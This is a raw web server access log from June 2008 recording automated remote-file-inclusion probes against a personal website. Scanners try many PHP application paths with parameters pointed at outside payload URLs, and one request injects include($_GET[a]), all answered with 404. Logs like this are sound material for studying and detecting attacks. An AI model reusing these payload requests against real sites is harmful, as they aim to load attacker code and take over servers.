217.115.197.49 - - [15/Jun/2008:19:56:47 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:56:48 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:56:52 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:56:52 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:57:14 -0700] "GET /logs/access_080211.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:57:15 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:57:15 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:19:57:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:19:57:23 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:19:58:47 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:19:58:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:59:22 -0700] "GET /logs/access.log/ontenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:59:30 -0700] "GET /ontenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:59:30 -0700] "GET /logs/ontenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:59:48 -0700] "GET /logs/access.log/ontenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:59:48 -0700] "GET /ontenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:20:00:20 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:20:00:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:20:00:20 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:20:00:20 -0700] "GET /logs/access_071217.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:20:00:27 -0700] "GET /logs/access.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:20:00:28 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:20:00:29 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:01:29 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:01:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:01:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:03:06 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:03:07 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:06:15 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:06:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:06:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.15.114 - - [15/Jun/2008:20:06:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.84.15.114 - - [15/Jun/2008:20:06:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:55 -0700] "GET /logs/access.log//index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:55 -0700] "GET //index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:55 -0700] "GET /logs//index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:56 -0700] "GET /logs/access.log//index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:56 -0700] "GET //index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:20:06:56 -0700] "GET /logs//index.php?p=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:07:43 -0700] "GET /logs/access_080211.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:07:43 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:07:43 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:08:56 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:08:56 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.233.63.80 - - [15/Jun/2008:20:08:56 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
193.140.181.20 - - [15/Jun/2008:20:09:53 -0700] "GET /logs/access_080414.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.140.181.20 - - [15/Jun/2008:20:09:53 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.140.181.20 - - [15/Jun/2008:20:09:54 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:20:11:04 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:20:11:04 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:20:11:04 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:20:12:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:20:12:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:12:45 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:15:31 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:15:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:15:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:20:15:54 -0700] "GET /index.php?xcart_dir=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:20:15:58 -0700] "GET /logs/index.php?xcart_dir=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:20:16:52 -0700] "GET /logs/access.log/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:20:18:06 -0700] "GET /logs/access.log/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:20:18:10 -0700] "GET /Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:19:07 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:19:08 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:19:40 -0700] "GET //guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
193.173.48.114 - - [15/Jun/2008:20:21:26 -0700] "GET /logs//OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
193.173.48.114 - - [15/Jun/2008:20:21:27 -0700] "GET //OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:20:24:45 -0700] "GET /logs/access.log/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:24:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:24:58 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
62.210.190.242 - - [15/Jun/2008:20:26:16 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
62.210.190.242 - - [15/Jun/2008:20:26:16 -0700] "GET //guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:15 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:15 -0700] "GET //guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:16 -0700] "GET /logs//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.98.70.18 - - [15/Jun/2008:20:27:19 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:26 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:26 -0700] "GET //guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:27:28 -0700] "GET /logs//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:27:49 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:27:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:27:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
200.68.101.180 - - [15/Jun/2008:20:28:11 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.68.101.180 - - [15/Jun/2008:20:28:12 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:28:17 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:28:17 -0700] "GET //guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
200.150.62.101 - - [15/Jun/2008:20:29:09 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.150.62.101 - - [15/Jun/2008:20:29:15 -0700] "GET //guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:29:18 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:29:18 -0700] "GET //guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
221.143.46.190 - - [15/Jun/2008:20:29:18 -0700] "GET /logs//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.150.62.101 - - [15/Jun/2008:20:29:20 -0700] "GET /logs//guestbook//admin.php?include_path=http://ecology.animewarriors.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:20:29:47 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:30:51 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:30:51 -0700] "GET //guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:30:51 -0700] "GET /logs//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:33:27 -0700] "GET /logs/access_080107.log//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:33:27 -0700] "GET //guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:33:27 -0700] "GET /logs//guestbook//admin.php?include_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:33:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:33:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:35:11 -0700] "GET /logs/access_080414.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:35:12 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:20:35:13 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
203.172.184.72 - - [15/Jun/2008:20:35:44 -0700] "GET /logs/access_071217.log//skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.172.184.72 - - [15/Jun/2008:20:35:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:20:35:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:37:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:37:37 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:40:50 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:20:40:51 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
